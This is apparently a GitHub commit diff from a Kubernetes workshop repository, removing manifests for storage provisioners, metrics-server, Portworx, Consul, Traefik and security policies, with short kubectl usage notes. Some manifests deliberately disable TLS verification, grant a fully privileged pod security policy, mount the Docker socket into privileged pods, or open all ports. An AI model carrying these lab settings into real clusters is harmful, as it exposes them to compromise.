@@ -1,110 +0,0 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
---
apiVersion: v1
kind: Namespace
metadata:
name: local-path-storage
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: local-path-provisioner-role
namespace: local-path-storage
rules:
- apiGroups: [""]
resources: ["nodes", "persistentvolumeclaims"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["endpoints", "persistentvolumes", "pods"]
verbs: ["*"]
- apiGroups: [""]
resources: ["events"]
verbs: ["create", "patch"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: local-path-provisioner-bind
namespace: local-path-storage
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
name: local-path-provisioner-service-account
namespace: local-path-storage
---
apiVersion: apps/v1beta2
kind: Deployment
metadata:
name: local-path-provisioner
namespace: local-path-storage
spec:
replicas: 1
selector:
matchLabels:
app: local-path-provisioner
template:
metadata:
labels:
app: local-path-provisioner
spec:
serviceAccountName: local-path-provisioner-service-account
containers:
- name: local-path-provisioner
image: rancher/local-path-provisioner:v0.0.8
imagePullPolicy: Always
command:
- local-path-provisioner
- --debug
- start
- --config
- /etc/config/config.json
volumeMounts:
- name: config-volume
mountPath: /etc/config/
env:
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
volumes:
- name: config-volume
configMap:
name: local-path-config
---
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: local-path
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete
---
kind: ConfigMap
apiVersion: v1
metadata:
name: local-path-config
namespace: local-path-storage
data:
config.json: |-
{
"nodePathMap":[
{
"node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
"paths":["/opt/local-path-provisioner"]
}
]
}

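A quick way to exercise this provisioner after applying the manifest; note the local-path class uses WaitForFirstConsumer, so a claim binds only once a pod references it:

```bash
# a minimal test claim (name and size are made up)
kubectl apply -f - <<EOF
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: test-local-path
spec:
  storageClassName: local-path
  accessModes: [ReadWriteOnce]
  resources:
    requests:
      storage: 100Mi
EOF
kubectl get pvc test-local-path   # Pending until a pod uses it
```
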
View File

@@ -1,138 +0,0 @@
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: system:aggregated-metrics-reader
labels:
rbac.authorization.k8s.io/aggregate-to-view: "true"
rbac.authorization.k8s.io/aggregate-to-edit: "true"
rbac.authorization.k8s.io/aggregate-to-admin: "true"
rules:
- apiGroups: ["metrics.k8s.io"]
resources: ["pods"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: metrics-server:system:auth-delegator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:auth-delegator
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
name: metrics-server-auth-reader
namespace: kube-system
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: extension-apiserver-authentication-reader
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system
---
apiVersion: apiregistration.k8s.io/v1beta1
kind: APIService
metadata:
name: v1beta1.metrics.k8s.io
spec:
service:
name: metrics-server
namespace: kube-system
group: metrics.k8s.io
version: v1beta1
insecureSkipTLSVerify: true
groupPriorityMinimum: 100
versionPriority: 100
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: metrics-server
namespace: kube-system
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: metrics-server
namespace: kube-system
labels:
k8s-app: metrics-server
spec:
selector:
matchLabels:
k8s-app: metrics-server
template:
metadata:
name: metrics-server
labels:
k8s-app: metrics-server
spec:
serviceAccountName: metrics-server
volumes:
# mount in tmp so we can safely use from-scratch images and/or read-only containers
- name: tmp-dir
emptyDir: {}
containers:
- name: metrics-server
image: k8s.gcr.io/metrics-server-amd64:v0.3.1
imagePullPolicy: Always
volumeMounts:
- name: tmp-dir
mountPath: /tmp
args:
- --kubelet-preferred-address-types=InternalIP
- --kubelet-insecure-tls
- --metric-resolution=5s
---
apiVersion: v1
kind: Service
metadata:
name: metrics-server
namespace: kube-system
labels:
kubernetes.io/name: "Metrics-server"
spec:
selector:
k8s-app: metrics-server
ports:
- port: 443
protocol: TCP
targetPort: 443
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: system:metrics-server
rules:
- apiGroups:
- ""
resources:
- pods
- nodes
- nodes/stats
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: system:metrics-server
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:metrics-server
subjects:
- kind: ServiceAccount
name: metrics-server
namespace: kube-system

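Once this metrics-server manifest is applied and the APIService registers (it can take a minute), resource metrics become available through kubectl:

```bash
kubectl top nodes
kubectl top pods --all-namespaces
```
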
View File

@@ -5,7 +5,7 @@ metadata:
spec:
podSelector:
matchLabels:
app: testweb
run: testweb
ingress:
- from:
- podSelector:

View File

@@ -5,6 +5,6 @@ metadata:
spec:
podSelector:
matchLabels:
app: testweb
run: testweb
ingress: []

View File

@@ -1,22 +0,0 @@
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: deny-from-other-namespaces
spec:
podSelector:
matchLabels:
ingress:
- from:
- podSelector: {}
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-webui
spec:
podSelector:
matchLabels:
app: webui
ingress:
- from: []

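In these two deleted policies, the empty podSelector in deny-from-other-namespaces matches every pod (restricting ingress to same-namespace peers), while allow-webui's empty `from: []` re-opens pods labeled app=webui to traffic from anywhere. A sketch of checking the open path, assuming the policies live in the default namespace:

```bash
kubectl run webui --image=nginx --labels=app=webui
kubectl expose pod webui --port=80
# reachable even from a pod in another namespace, thanks to allow-webui
kubectl -n kube-system run test --rm -it --restart=Never --image=alpine \
  -- wget -qO- -T 2 http://webui.default
```
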
View File

@@ -1,21 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: nginx-with-volume
spec:
volumes:
- name: www
containers:
- name: nginx
image: nginx
volumeMounts:
- name: www
mountPath: /usr/share/nginx/html/
- name: git
image: alpine
command: [ "sh", "-c", "apk add --no-cache git && git clone https://github.com/octocat/Spoon-Knife /www" ]
volumeMounts:
- name: www
mountPath: /www/
restartPolicy: OnFailure

View File

@@ -1,95 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [ "" ]
resources: [ pods ]
verbs: [ get, list ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
namespace: orange
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.4.4"
volumeMounts:
- name: data
mountPath: /consul/data
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- consul leave

View File

@@ -1,580 +0,0 @@
# SOURCE: https://install.portworx.com/?kbver=1.11.2&b=true&s=/dev/loop4&c=px-workshop&stork=true&lh=true
apiVersion: v1
kind: ConfigMap
metadata:
name: stork-config
namespace: kube-system
data:
policy.cfg: |-
{
"kind": "Policy",
"apiVersion": "v1",
"extenders": [
{
"urlPrefix": "http://stork-service.kube-system.svc:8099",
"apiVersion": "v1beta1",
"filterVerb": "filter",
"prioritizeVerb": "prioritize",
"weight": 5,
"enableHttps": false,
"nodeCacheCapable": false
}
]
}
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: stork-account
namespace: kube-system
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: stork-role
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["get", "list", "delete"]
- apiGroups: [""]
resources: ["persistentvolumes"]
verbs: ["get", "list", "watch", "create", "delete"]
- apiGroups: [""]
resources: ["persistentvolumeclaims"]
verbs: ["get", "list", "watch", "update"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["events"]
verbs: ["list", "watch", "create", "update", "patch"]
- apiGroups: ["apiextensions.k8s.io"]
resources: ["customresourcedefinitions"]
verbs: ["create", "list", "watch", "delete"]
- apiGroups: ["volumesnapshot.external-storage.k8s.io"]
resources: ["volumesnapshots"]
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: ["volumesnapshot.external-storage.k8s.io"]
resources: ["volumesnapshotdatas"]
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get", "create", "update"]
- apiGroups: [""]
resources: ["services"]
verbs: ["get"]
- apiGroups: [""]
resources: ["nodes"]
verbs: ["get", "list", "watch"]
- apiGroups: ["*"]
resources: ["deployments", "deployments/extensions"]
verbs: ["list", "get", "watch", "patch", "update", "initialize"]
- apiGroups: ["*"]
resources: ["statefulsets", "statefulsets/extensions"]
verbs: ["list", "get", "watch", "patch", "update", "initialize"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: stork-role-binding
subjects:
- kind: ServiceAccount
name: stork-account
namespace: kube-system
roleRef:
kind: ClusterRole
name: stork-role
apiGroup: rbac.authorization.k8s.io
---
kind: Service
apiVersion: v1
metadata:
name: stork-service
namespace: kube-system
spec:
selector:
name: stork
ports:
- protocol: TCP
port: 8099
targetPort: 8099
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ""
labels:
tier: control-plane
name: stork
namespace: kube-system
spec:
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
replicas: 3
template:
metadata:
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ""
labels:
name: stork
tier: control-plane
spec:
containers:
- command:
- /stork
- --driver=pxd
- --verbose
- --leader-elect=true
- --health-monitor-interval=120
imagePullPolicy: Always
image: openstorage/stork:1.1.3
resources:
requests:
cpu: '0.1'
name: stork
hostPID: false
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: "name"
operator: In
values:
- stork
topologyKey: "kubernetes.io/hostname"
serviceAccountName: stork-account
---
kind: StorageClass
apiVersion: storage.k8s.io/v1
metadata:
name: stork-snapshot-sc
provisioner: stork-snapshot
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: stork-scheduler-account
namespace: kube-system
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: stork-scheduler-role
rules:
- apiGroups: [""]
resources: ["endpoints"]
verbs: ["get", "update"]
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get"]
- apiGroups: [""]
resources: ["events"]
verbs: ["create", "patch", "update"]
- apiGroups: [""]
resources: ["endpoints"]
verbs: ["create"]
- apiGroups: [""]
resourceNames: ["kube-scheduler"]
resources: ["endpoints"]
verbs: ["delete", "get", "patch", "update"]
- apiGroups: [""]
resources: ["nodes"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["delete", "get", "list", "watch"]
- apiGroups: [""]
resources: ["bindings", "pods/binding"]
verbs: ["create"]
- apiGroups: [""]
resources: ["pods/status"]
verbs: ["patch", "update"]
- apiGroups: [""]
resources: ["replicationcontrollers", "services"]
verbs: ["get", "list", "watch"]
- apiGroups: ["app", "extensions"]
resources: ["replicasets"]
verbs: ["get", "list", "watch"]
- apiGroups: ["apps"]
resources: ["statefulsets"]
verbs: ["get", "list", "watch"]
- apiGroups: ["policy"]
resources: ["poddisruptionbudgets"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["persistentvolumeclaims", "persistentvolumes"]
verbs: ["get", "list", "watch"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "watch"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: stork-scheduler-role-binding
subjects:
- kind: ServiceAccount
name: stork-scheduler-account
namespace: kube-system
roleRef:
kind: ClusterRole
name: stork-scheduler-role
apiGroup: rbac.authorization.k8s.io
---
apiVersion: apps/v1beta1
kind: Deployment
metadata:
labels:
component: scheduler
tier: control-plane
name: stork-scheduler
name: stork-scheduler
namespace: kube-system
spec:
replicas: 3
template:
metadata:
labels:
component: scheduler
tier: control-plane
name: stork-scheduler
spec:
containers:
- command:
- /usr/local/bin/kube-scheduler
- --address=0.0.0.0
- --leader-elect=true
- --scheduler-name=stork
- --policy-configmap=stork-config
- --policy-configmap-namespace=kube-system
- --lock-object-name=stork-scheduler
image: gcr.io/google_containers/kube-scheduler-amd64:v1.11.2
livenessProbe:
httpGet:
path: /healthz
port: 10251
initialDelaySeconds: 15
name: stork-scheduler
readinessProbe:
httpGet:
path: /healthz
port: 10251
resources:
requests:
cpu: '0.1'
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: "name"
operator: In
values:
- stork-scheduler
topologyKey: "kubernetes.io/hostname"
hostPID: false
serviceAccountName: stork-scheduler-account
---
kind: Service
apiVersion: v1
metadata:
name: portworx-service
namespace: kube-system
labels:
name: portworx
spec:
selector:
name: portworx
ports:
- name: px-api
protocol: TCP
port: 9001
targetPort: 9001
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: px-account
namespace: kube-system
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: node-get-put-list-role
rules:
- apiGroups: [""]
resources: ["nodes"]
verbs: ["watch", "get", "update", "list"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["delete", "get", "list"]
- apiGroups: [""]
resources: ["persistentvolumeclaims", "persistentvolumes"]
verbs: ["get", "list"]
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get", "list", "update", "create"]
- apiGroups: ["extensions"]
resources: ["podsecuritypolicies"]
resourceNames: ["privileged"]
verbs: ["use"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: node-role-binding
subjects:
- kind: ServiceAccount
name: px-account
namespace: kube-system
roleRef:
kind: ClusterRole
name: node-get-put-list-role
apiGroup: rbac.authorization.k8s.io
---
apiVersion: v1
kind: Namespace
metadata:
name: portworx
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: px-role
namespace: portworx
rules:
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get", "list", "create", "update", "patch"]
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: px-role-binding
namespace: portworx
subjects:
- kind: ServiceAccount
name: px-account
namespace: kube-system
roleRef:
kind: Role
name: px-role
apiGroup: rbac.authorization.k8s.io
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: portworx
namespace: kube-system
annotations:
portworx.com/install-source: "https://install.portworx.com/?kbver=1.11.2&b=true&s=/dev/loop4&c=px-workshop&stork=true&lh=true"
spec:
minReadySeconds: 0
updateStrategy:
type: RollingUpdate
rollingUpdate:
maxUnavailable: 1
template:
metadata:
labels:
name: portworx
spec:
affinity:
nodeAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
nodeSelectorTerms:
- matchExpressions:
- key: px/enabled
operator: NotIn
values:
- "false"
- key: node-role.kubernetes.io/master
operator: DoesNotExist
hostNetwork: true
hostPID: false
containers:
- name: portworx
image: portworx/oci-monitor:1.4.2.2
imagePullPolicy: Always
args:
["-c", "px-workshop", "-s", "/dev/loop4", "-b",
"-x", "kubernetes"]
env:
- name: "PX_TEMPLATE_VERSION"
value: "v4"
livenessProbe:
periodSeconds: 30
initialDelaySeconds: 840 # allow image pull in slow networks
httpGet:
host: 127.0.0.1
path: /status
port: 9001
readinessProbe:
periodSeconds: 10
httpGet:
host: 127.0.0.1
path: /health
port: 9015
terminationMessagePath: "/tmp/px-termination-log"
securityContext:
privileged: true
volumeMounts:
- name: dockersock
mountPath: /var/run/docker.sock
- name: etcpwx
mountPath: /etc/pwx
- name: optpwx
mountPath: /opt/pwx
- name: proc1nsmount
mountPath: /host_proc/1/ns
- name: sysdmount
mountPath: /etc/systemd/system
- name: diagsdump
mountPath: /var/cores
- name: journalmount1
mountPath: /var/run/log
readOnly: true
- name: journalmount2
mountPath: /var/log
readOnly: true
- name: dbusmount
mountPath: /var/run/dbus
restartPolicy: Always
serviceAccountName: px-account
volumes:
- name: dockersock
hostPath:
path: /var/run/docker.sock
- name: etcpwx
hostPath:
path: /etc/pwx
- name: optpwx
hostPath:
path: /opt/pwx
- name: proc1nsmount
hostPath:
path: /proc/1/ns
- name: sysdmount
hostPath:
path: /etc/systemd/system
- name: diagsdump
hostPath:
path: /var/cores
- name: journalmount1
hostPath:
path: /var/run/log
- name: journalmount2
hostPath:
path: /var/log
- name: dbusmount
hostPath:
path: /var/run/dbus
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: px-lh-account
namespace: kube-system
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: px-lh-role
namespace: kube-system
rules:
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get", "create", "update"]
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: px-lh-role-binding
namespace: kube-system
subjects:
- kind: ServiceAccount
name: px-lh-account
namespace: kube-system
roleRef:
kind: Role
name: px-lh-role
apiGroup: rbac.authorization.k8s.io
---
apiVersion: v1
kind: Service
metadata:
name: px-lighthouse
namespace: kube-system
labels:
tier: px-web-console
spec:
type: NodePort
ports:
- name: http
port: 80
nodePort: 32678
- name: https
port: 443
nodePort: 32679
selector:
tier: px-web-console
---
apiVersion: apps/v1beta2
kind: Deployment
metadata:
name: px-lighthouse
namespace: kube-system
labels:
tier: px-web-console
spec:
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
selector:
matchLabels:
tier: px-web-console
replicas: 1
template:
metadata:
labels:
tier: px-web-console
spec:
initContainers:
- name: config-init
image: portworx/lh-config-sync:0.2
imagePullPolicy: Always
args:
- "init"
volumeMounts:
- name: config
mountPath: /config/lh
containers:
- name: px-lighthouse
image: portworx/px-lighthouse:1.5.0
imagePullPolicy: Always
ports:
- containerPort: 80
- containerPort: 443
volumeMounts:
- name: config
mountPath: /config/lh
- name: config-sync
image: portworx/lh-config-sync:0.2
imagePullPolicy: Always
args:
- "sync"
volumeMounts:
- name: config
mountPath: /config/lh
serviceAccountName: px-lh-account
volumes:
- name: config
emptyDir: {}

View File

@@ -1,30 +0,0 @@
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: postgres
spec:
selector:
matchLabels:
app: postgres
serviceName: postgres
template:
metadata:
labels:
app: postgres
spec:
schedulerName: stork
containers:
- name: postgres
image: postgres:10.5
volumeMounts:
- mountPath: /var/lib/postgresql/data
name: postgres
volumeClaimTemplates:
- metadata:
name: postgres
spec:
accessModes: ["ReadWriteOnce"]
resources:
requests:
storage: 1Gi

View File

@@ -1,39 +0,0 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
name: privileged
annotations:
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
privileged: true
allowPrivilegeEscalation: true
allowedCapabilities:
- '*'
volumes:
- '*'
hostNetwork: true
hostPorts:
- min: 0
max: 65535
hostIPC: true
hostPID: true
runAsUser:
rule: 'RunAsAny'
seLinux:
rule: 'RunAsAny'
supplementalGroups:
rule: 'RunAsAny'
fsGroup:
rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:privileged
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['privileged']

View File

@@ -1,38 +0,0 @@
---
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
annotations:
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
name: restricted
spec:
allowPrivilegeEscalation: false
fsGroup:
rule: RunAsAny
runAsUser:
rule: RunAsAny
seLinux:
rule: RunAsAny
supplementalGroups:
rule: RunAsAny
volumes:
- configMap
- emptyDir
- projected
- secret
- downwardAPI
- persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:restricted
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['restricted']

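These PodSecurityPolicy manifests only define the policies and matching `use` ClusterRoles; nothing is bound to them here. A sketch of binding the restricted policy cluster-wide, assuming the PSP admission plugin is enabled:

```bash
kubectl create clusterrolebinding psp:restricted \
  --clusterrole=psp:restricted \
  --group=system:serviceaccounts
```
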
View File

@@ -1,15 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: registry
spec:
containers:
- name: registry
image: registry
env:
- name: REGISTRY_HTTP_ADDR
valueFrom:
configMapKeyRef:
name: registry
key: http.addr

View File

@@ -6,7 +6,7 @@ metadata:
creationTimestamp: null
generation: 1
labels:
app: socat
run: socat
name: socat
namespace: kube-system
selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/socat
@@ -14,7 +14,7 @@ spec:
replicas: 1
selector:
matchLabels:
app: socat
run: socat
strategy:
rollingUpdate:
maxSurge: 1
@@ -24,7 +24,7 @@ spec:
metadata:
creationTimestamp: null
labels:
app: socat
run: socat
spec:
containers:
- args:
@@ -49,7 +49,7 @@ kind: Service
metadata:
creationTimestamp: null
labels:
app: socat
run: socat
name: socat
namespace: kube-system
selfLink: /api/v1/namespaces/kube-system/services/socat
@@ -60,7 +60,7 @@ spec:
protocol: TCP
targetPort: 80
selector:
app: socat
run: socat
sessionAffinity: None
type: NodePort
status:

View File

@@ -1,11 +0,0 @@
kind: StorageClass
apiVersion: storage.k8s.io/v1beta1
metadata:
name: portworx-replicated
annotations:
storageclass.kubernetes.io/is-default-class: "true"
provisioner: kubernetes.io/portworx-volume
parameters:
repl: "2"
priority_io: "high"

View File

@@ -1,100 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: traefik-ingress-controller
namespace: kube-system
---
kind: DaemonSet
apiVersion: extensions/v1beta1
metadata:
name: traefik-ingress-controller
namespace: kube-system
labels:
k8s-app: traefik-ingress-lb
spec:
template:
metadata:
labels:
k8s-app: traefik-ingress-lb
name: traefik-ingress-lb
spec:
tolerations:
- effect: NoSchedule
operator: Exists
hostNetwork: true
serviceAccountName: traefik-ingress-controller
terminationGracePeriodSeconds: 60
containers:
- image: traefik
name: traefik-ingress-lb
ports:
- name: http
containerPort: 80
hostPort: 80
- name: admin
containerPort: 8080
hostPort: 8080
securityContext:
capabilities:
drop:
- ALL
add:
- NET_BIND_SERVICE
args:
- --api
- --kubernetes
- --logLevel=INFO
---
kind: Service
apiVersion: v1
metadata:
name: traefik-ingress-service
namespace: kube-system
spec:
selector:
k8s-app: traefik-ingress-lb
ports:
- protocol: TCP
port: 80
name: web
- protocol: TCP
port: 8080
name: admin
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: traefik-ingress-controller
rules:
- apiGroups:
- ""
resources:
- services
- endpoints
- secrets
verbs:
- get
- list
- watch
- apiGroups:
- extensions
resources:
- ingresses
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: traefik-ingress-controller
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
name: traefik-ingress-controller
namespace: kube-system

View File

@@ -1,33 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: jean.doe
namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: users:jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
resources: [ certificatesigningrequests ]
verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
resourceNames: [ users:jean.doe ]
resources: [ certificatesigningrequests ]
verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: users:jean.doe
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: users:jean.doe
subjects:
- kind: ServiceAccount
name: jean.doe
namespace: users

View File

@@ -1,70 +0,0 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node2
annotations:
node: node2
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node3
annotations:
node: node3
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node4
annotations:
node: node4
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node4

View File

@@ -32,7 +32,7 @@ Virtualbox, Vagrant and Ansible
$ source path/to/your-ansible-clone/hacking/env-setup
- you need to repeat the last step every time you open a new terminal session
- you need to repeat the last step everytime you open a new terminal session
and want to use any Ansible command (but you'll probably only need to run
it once).

View File

@@ -1,10 +1,4 @@
# Trainer tools to create and prepare VMs for Docker workshops
These tools can help you to create VMs on:
- Azure
- EC2
- OpenStack
# Trainer tools to create and prepare VMs for Docker workshops on AWS or Azure
## Prerequisites
@@ -12,9 +6,6 @@ These tools can help you to create VMs on:
- [Docker Compose](https://docs.docker.com/compose/install/)
- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`) - the configuration scripts require this
Depending on the infrastructure that you want to use, you also need to install
the Azure CLI, the AWS CLI, or terraform (for OpenStack deployment).
And if you want to generate printable cards:
- [pyyaml](https://pypi.python.org/pypi/PyYAML) (on a Mac: `brew install pyyaml`)
@@ -23,25 +14,20 @@ And if you want to generate printable cards:
## General Workflow
- fork/clone repo
- create an infrastructure configuration in the `prepare-vms/infra` directory
(using one of the example files in that directory)
- set required environment variables
- create your own setting file from `settings/example.yaml`
- if necessary, increase allowed open files: `ulimit -Sn 10000`
- run `./workshopctl start` to create instances
- run `./workshopctl deploy` to install Docker and setup environment
- run `./workshopctl kube` (if you want to install and setup Kubernetes)
- run `./workshopctl cards` (if you want to generate a PDF for printing handouts of each user's host IPs and login info)
- run `./workshopctl stop` at the end of the workshop to terminate instances
- run `./workshopctl` commands to create instances, install docker, setup each users environment in node1, other management tasks
- run the `./workshopctl cards` command to generate a PDF for printing handouts of each user's host IPs and login info
## Clone/Fork the Repo, and Build the Tools Image
The Docker Compose file here is used to build an image with all the dependencies to run the `./workshopctl` commands and optional tools. Each run of the script will check if you have those dependencies locally on your host, and will only use the container if you're [missing a dependency](workshopctl#L5).
$ git clone https://github.com/jpetazzo/container.training
$ cd container.training/prepare-vms
$ git clone https://github.com/jpetazzo/orchestration-workshop.git
$ cd orchestration-workshop/prepare-vms
$ docker-compose build
## Preparing to Run `./workshopctl`
### Required AWS Permissions/Info
@@ -50,37 +36,27 @@ The Docker Compose file here is used to build a image with all the dependencies
- Using a non-default VPC or Security Group isn't supported out of the box yet, so you will have to customize `lib/commands.sh` if you want to change that.
- These instances will assign the default VPC Security Group, which does not open any ports from Internet by default. So you'll need to add Inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`, or run `./workshopctl opensg` which opens up all ports.
### Create your `infra` file
### Required Environment Variables
You need to do this only once. (On AWS, you can create one `infra`
file per region.)
- `AWS_ACCESS_KEY_ID`
- `AWS_SECRET_ACCESS_KEY`
